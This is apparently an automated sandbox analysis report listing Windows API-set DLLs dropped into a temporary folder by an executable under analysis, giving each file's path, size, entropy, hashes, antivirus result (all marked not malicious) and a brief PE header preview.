                                                                                                                                                                                                                      SHA1:25EACAAA4C6F89945E97388796A8C85BA6FB01FB
                                                                                                                                                                                                                      SHA-256:A011260FAFAAAEFD7E7326D8D5290C6A76D55E5AF4E43FFA4DE5FEA9B08FA928
                                                                                                                                                                                                                      SHA-512:E8E2E7C5BFF41CCAA0F77C3CFEE48DAC43C11E75688F03B719CC1D716DB047597A7A2CE25B561171EF259957BDCD9DD4345A0E0125DB2B36F31698BA178E2248
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......j....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):23320
                                                                                                                                                                                                                      Entropy (8bit):6.972639549935684
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:2BPvVX7WEhWXqEQpBj0HRN7UQHRN7mSIlexb:+PvVXDqHqWU8m6l
                                                                                                                                                                                                                      MD5:642B29701907E98E2AA7D36EBA7D78B8
                                                                                                                                                                                                                      SHA1:16F46B0E057816F3592F9C0A6671111EA2F35114
                                                                                                                                                                                                                      SHA-256:5D72FEAC789562D445D745A55A99536FA9302B0C27B8F493F025BA69BA31941C
                                                                                                                                                                                                                      SHA-512:1BEAB2B368CC595BEB39B2F5A2F52D334BC42BF674B8039D334C6D399C966AFF0B15876105F0A4A54FA08E021CB44907ED47D31A0AF9E789EB4102B82025CF57
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................@............`.........................................`................0...................A..............8............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.053716052760641
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:9ZWEhWwqEQpBj0HRN7xnE77QHRN7ICMlly:9ZJHqWNE778r
                                                                                                                                                                                                                      MD5:F0C73F7454A5CE6FB8E3D795FDB0235D
                                                                                                                                                                                                                      SHA1:ACDD6C5A359421D268B28DDF19D3BCB71F36C010
                                                                                                                                                                                                                      SHA-256:2A59DD891533A028FAE7A81E690E4C28C9074C2F327393FAB17329AFFE53FD7B
                                                                                                                                                                                                                      SHA-512:BD6CF4E37C3E7A1A3B36F42858AF1B476F69CAA4BA1FD836A7E32220E5EFF7CCC811C903019560844AF988A7C77CC41DC6216C0C949D8E04516A537DA5821A3E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0...........`.........................................`...L............ ...................A..............8............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.113839950805383
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:IVxWEhWnqEQpBj0HRN7HQHRN7YAXAXOVlTS:IVh6HqWH8lAH
                                                                                                                                                                                                                      MD5:7D4D4593B478B4357446C106B64E61F8
                                                                                                                                                                                                                      SHA1:8A4969C9E59D7A7485C8CC5723C037B20DEA5C9D
                                                                                                                                                                                                                      SHA-256:0A6E2224CDE90A0D41926E8863F9956848FFBF19848E8855BD08953112AFC801
                                                                                                                                                                                                                      SHA-512:7BC9C473705EC98BA0C1DA31C295937D97710CEDEFC660F6A5CB0512BAE36AD23BEBB2F6F14DF7CE7F90EC3F817B02F577317FDD514560AAB22CB0434D8E4E0B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...).NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.052601866399419
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:XWEhW2lQpBj0HRN7NkhXQHRN7vnR1lp1x09lgerA:37qWw8vRnpss
                                                                                                                                                                                                                      MD5:7BC1B8712E266DB746914DB48B27EF9C
                                                                                                                                                                                                                      SHA1:C76EB162C23865B3F1BD7978F7979D6BA09CCB60
                                                                                                                                                                                                                      SHA-256:F82D05AEA21BCF6337EF45FBDAD6D647D17C043A67B44C7234F149F861A012B9
                                                                                                                                                                                                                      SHA-512:DB6983F5F9C18908266DBF01EF95EBAE49F88EDC04A0515699EF12201AC9A50F09939B8784C75AE513105ADA5B155E5330BD42D70F8C8C48FE6005513AEFAD2A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......r....`.........................................`..._............ ...................A..............8............................................................................rdata..t...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.028564065154355
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:nZlrPWEhWcrIAjW65FdQpBjSdHnhWgN7a8WcA+0W65FdQHnhWgN7a8W1P5mzVEMW:ZlzWEhWKFQpBj0HRN7JGQHRN7rCMllq
                                                                                                                                                                                                                      MD5:B071E761CEA670D89D7AE80E016CE7E6
                                                                                                                                                                                                                      SHA1:C675BE753DBEF1624100F16674C2221A20CF07DD
                                                                                                                                                                                                                      SHA-256:63FB84A49308B857804AE1481D2D53B00A88BBD806D257D196DE2BD5C385701E
                                                                                                                                                                                                                      SHA-512:F2ECBDABA3516D92BD29DCCE618185F1755451D95C7DBBE23F8215318F6F300A9964C93EC3ED65C5535D87BE82B668E1D3025A7E325AF71A05F14E15D530D35F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.064651561006373
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:DPWEhWcAQIqyW65FdQpBjSdHnhWgN7a8WcnKW65FdQHnhWgN7a8WwFoodqnajqxB:LWEhWFqEQpBj0HRN7XsQHRN7XSIlex7N
                                                                                                                                                                                                                      MD5:1DCCF27F2967601CE6666C8611317F03
                                                                                                                                                                                                                      SHA1:D8246DF2ED9EC4A8A719FD4B1DB4FD8A71EF679B
                                                                                                                                                                                                                      SHA-256:6A83AB9A413AFD74D77A090F52784B0128527BEE9CB0A4224C59D5C75FC18387
                                                                                                                                                                                                                      SHA-512:70B96D69D609211F8B9E05FA510EA7D574AE8DA3A6498F5C982AEE71635B8A749162247055B7BA21A884BFA06C1415B68912C463F0F1B6FFB9049F3532386877
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0...........`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.078698929399523
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:GvuBL3BXWEhWfnhLvQpBj0HRN7YQ3QHRN7Tp1x09lgek/:xBL3B3shLvqWYQ38Tps6
                                                                                                                                                                                                                      MD5:569A7AC3F6824A04282FF708C629A6D2
                                                                                                                                                                                                                      SHA1:FC0D78DE1075DFD4C1024A72074D09576D4D4181
                                                                                                                                                                                                                      SHA-256:84C579A8263A87991CA1D3AEE2845E1C262FB4B849606358062093D08AFDC7A2
                                                                                                                                                                                                                      SHA-512:E9CBFF82E32540F9230CEAD9063ACB1ACEB7CCC9F3338C0B7AD10B0AC70FF5B47C15944D0DCE33EA8405554AA9B75DE30B26AE2CA55DB159D45B6E64BC02A180
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......Gg....`.........................................`................ ...................A..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22296
                                                                                                                                                                                                                      Entropy (8bit):7.054401722955359
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:WOMw3zdp3bwjGjue9/0jCRrndbkWEhWE6yQpBj0HRN7LFQHRN7l8pUclXr:WOMwBprwjGjue9/0jCRrndby/qWLF8l4
                                                                                                                                                                                                                      MD5:1D75E7B9F68C23A195D408CF02248119
                                                                                                                                                                                                                      SHA1:62179FC9A949D238BB221D7C2F71BA7C1680184C
                                                                                                                                                                                                                      SHA-256:67EBE168B7019627D68064043680674F9782FDA7E30258748B29412C2B3D4C6B
                                                                                                                                                                                                                      SHA-512:C2EE84A9AEAC34F7B51426D12F87BB35D8C3238BB26A6E14F412EA485E5BD3B8FB5B1231323D4B089CF69D8180A38DDD7FD593CC52CBDF250125AD02D66EEA9D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......U.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.0496932942785735
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:/qWEhW8nhLvQpBj0HRN78riQHRN7TaSIlexO:ADhLvqWR8W6s
                                                                                                                                                                                                                      MD5:623283471B12F1BDB83E25DBAFAF9C16
                                                                                                                                                                                                                      SHA1:ECBBA66F4DCA89A3FAA3E242E30AEFAC8DE02153
                                                                                                                                                                                                                      SHA-256:9CA500775FEE9FF69B960D65040B8DC415A2EFDE2982A9251EE6A3E8DE625BC7
                                                                                                                                                                                                                      SHA-512:54B69FFA2C263BE4DDADCA62FA2867FEA6148949D64C2634745DB3DCBC1BA0ECF7167F02FA53EFD69EAAEE81D617D914F370F26CA16EE5850853F70C69E9A61F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...l............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.110045595478065
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:nWEhWC5oQpBj0HRN7EODQHRN7nvp1x09lgefv:nNaqWEo8nvpsH
                                                                                                                                                                                                                      MD5:61F70F2D1E3F22E976053DF5F3D8ECB7
                                                                                                                                                                                                                      SHA1:7D224B7F404CDE960E6B7A1C449B41050C8E9C58
                                                                                                                                                                                                                      SHA-256:2695761B010D22FDFDA2B5E73CF0AC7328CCC62B4B28101D5C10155DD9A48020
                                                                                                                                                                                                                      SHA-512:1DDC568590E9954DB198F102BE99EABB4133B49E9F3B464F2FC7F31CC77D06D5A7132152F4B331332C42F241562EE6C7BF1C2D68E546DB3F59AB47EAF83A22CF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......S.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20760
                                                                                                                                                                                                                      Entropy (8bit):7.026463196608447
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:UWWEhWsxlQpBj0HRN7l1khQHRN7kTPSIlexA:1DqWl1kh8kL62
                                                                                                                                                                                                                      MD5:1322690996CF4B2B7275A7950BAD9856
                                                                                                                                                                                                                      SHA1:502E05ED81E3629EA3ED26EE84A4E7C07F663735
                                                                                                                                                                                                                      SHA-256:5660030EE4C18B1610FB9F46E66F44D3FC1CF714ECCE235525F08F627B3738D7
                                                                                                                                                                                                                      SHA-512:7EDC06BFA9E633351291B449B283659E5DD9E706DD57ADE354BCE3AF55DF4842491AF27C7721B2ACC6948078BDFC8E9736FEC46E0641AF368D419C7ED6AEBD44
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......G.....`.........................................`...G............ ...................A..............8............................................................................rdata..h...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21784
                                                                                                                                                                                                                      Entropy (8bit):7.053725357941814
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:5WXk1JzNcKSImWEhW1qEQpBj0HRN77S4QHRN7j8AXOVlTHxE:5bcKSdkHqW+48j/cE
                                                                                                                                                                                                                      MD5:95612A8A419C61480B670D6767E72D09
                                                                                                                                                                                                                      SHA1:3B94D1745AFF6AAFEFF87FED7F23E45473F9AFC9
                                                                                                                                                                                                                      SHA-256:6781071119D66757EFA996317167904697216AD72D7C031AF4337138A61258D4
                                                                                                                                                                                                                      SHA-512:570F15C2C5AA599332DD4CFB3C90DA0DD565CA9053ECF1C2C05316A7F623615DD153497E93B38DF94971C8ABF2E25BC1AAAF3311F1CDA432F2670B32C767012A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.060875826104053
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:iDfIeAWEhWY6yQpBj0HRN7wHQHRN7NjZSIlexL:NemTqWC8NV6d
                                                                                                                                                                                                                      MD5:D6AD0F2652460F428C0E8FC40B6F6115
                                                                                                                                                                                                                      SHA1:1A5152871ABC5CF3D4868A218DE665105563775E
                                                                                                                                                                                                                      SHA-256:4EF09FA6510EEEBB4855B6F197B20A7A27B56368C63CC8A3D1014FA4231AB93A
                                                                                                                                                                                                                      SHA-512:CEAFEEE932919BC002B111D6D67B7C249C85D30DA35DFBCEBD1F37DB51E506AC161E4EE047FF8F7BF0D08DA6A7F8B97E802224920BD058F8E790E6FA0EE48B22
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......@!....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19224
                                                                                                                                                                                                                      Entropy (8bit):7.1376464003004685
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:tnjFPWEhWcCTQW65FdQpBjSdHnhWgN7a8Wc//W65FdQHnhWgN7a8WOR5mzVEMqnL:tnhWEhWnqQpBj0HRN7hQHRN7mCMll5i
                                                                                                                                                                                                                      MD5:654D95515AB099639F2739685CB35977
                                                                                                                                                                                                                      SHA1:9951854A5CF407051CE6CD44767BFD9BD5C4B0CC
                                                                                                                                                                                                                      SHA-256:C4868E4CEBDF86126377A45BD829D88449B4AA031C9B1C05EDC47D6D395949D4
                                                                                                                                                                                                                      SHA-512:9C9DD64A3AD1136BA62CCA14FC27574FAAEBC3DE1E371A86B83599260424A966DFD813991A5EF0B2342E0401CB99CE83CD82C19FCAE73C7DECDB92BAC1FB58A8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......N.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.038577027863076
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:QGeVdWEhWF4+QpBj0HRN7nKQHRN7KFcR8pUclXi:QGeVFp+qWK8AG8pUh
                                                                                                                                                                                                                      MD5:E6B7681CCC718DDB69C48ABE8709FDD6
                                                                                                                                                                                                                      SHA1:A518B705746B2C6276F56A2F1C996360B837D548
                                                                                                                                                                                                                      SHA-256:4B532729988224FE5D98056CD94FC3E8B4BA496519F461EF5D9D0FF9D9402D4B
                                                                                                                                                                                                                      SHA-512:89B20AFFAA23E674543F0F2E9B0A8B3ECD9A8A095E19D50E11C52CB205DAFDBF2672892FD35B1C45F16E78AE9B61525DE67DBE7673F8CA450AA8C42FEEAC0895
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......2....`.........................................`................ ...................A..............8............................................................................rdata..,...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.087741938037833
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:nyMvfWEhWtJ7QpBj0HRN7n0QHRN7gTtAXOVlTF2:nyMvPq7qWn08gWd
                                                                                                                                                                                                                      MD5:BCB412464F01467F1066E94085957F42
                                                                                                                                                                                                                      SHA1:716C11B5D759D59DBFEC116874E382D69F9A25B6
                                                                                                                                                                                                                      SHA-256:F040B6E07935B67599EA7E32859A3E93DB37FF4195B28B4451AD0D274DB6330E
                                                                                                                                                                                                                      SHA-512:79EC0C5EE21680843C8B7F22DA3155B7607D5BE269F8A51056CC5F060AD3A48CED3B6829117262ABA1A90E692374B59DDFE92105D14179F631EFC0C863BFDECB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......#j....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21784
                                                                                                                                                                                                                      Entropy (8bit):7.005386895286503
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:Ddv3V0dfpkXc0vVaEWEhWYYxnhLvQpBj0HRN7gPZGQHRN7xuHNiWXhlhOY3:Ddv3VqpkXc0vVaS5ahLvqWSA8sNizM
